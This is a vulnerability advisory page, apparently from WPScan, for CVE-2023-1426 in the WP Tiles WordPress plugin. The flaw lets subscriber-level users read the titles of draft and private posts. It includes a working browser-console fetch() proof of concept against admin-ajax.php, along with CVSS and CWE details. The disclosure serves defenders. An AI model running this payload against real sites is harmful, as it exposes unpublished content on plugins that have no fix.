WordPress Plugin Vulnerabilities

WP Tiles <= 1.1.2 - Subscriber+ Draft/Private Post Title Disclosure

Description

The plugin does not ensure that posts to be displayed are not draft/private, allowing any authenticated users, such as subscriber to retrieve the titles of draft and privates posts for example. AN attacker could also retrieve the title of any other type of post.

Proof of Concept

Run the below command in the developer console of the web browser while being on the blog as a subscriber user

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": "action=parse-media-shortcode&shortcode=[wp-tiles post_status='draft']",
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

This will display the titles of all draft posts. Change post_status to private for private posts, or any to list everything

Affects Plugins

Plugin icon
wp-tiles
No known fix

References

CVE
CVE-2023-1426

Classification

Type
SENSITIVE DATA DISCLOSURE
OWASP top 10
A3: Sensitive Data Exposure
CWE
CWE-200
CVSS
4.3 (medium)

Miscellaneous

Original Researcher
Erwan LR (WPScan)
Verified
Yes
WPVDB ID
fdd79bb4-d434-4635-bb2b-84d079ecc746

Timeline

Publicly Published
2023-03-16 (about 1 years ago)
Added
2023-03-16 (about 1 years ago)
Last Updated
2023-03-16 (about 1 years ago)

Other

Published
Title
Published
2022-11-10
Title
Clerk < 4.0.0 - Authentication Bypass and API Keys Disclosure
Published
2024-03-18
Title
WP Go Maps < 9.0.35 - Information Exposure to Potential Denial of Service
Published
2023-07-19
Title
Essential Addons For Elementor < 5.8.2 - Unauthenticated MailChimp API Key Disclosure
Published
2023-10-18
Title
Popup by Supsystic < 1.10.20 - Missing Authorization to Sensitive Information Exposure
Published
2024-01-10
Title
Profile Builder Pro < 3.10.1 - Authenticated (Subscriber+) Time-Based One-Time Password Sensitive Information Exposure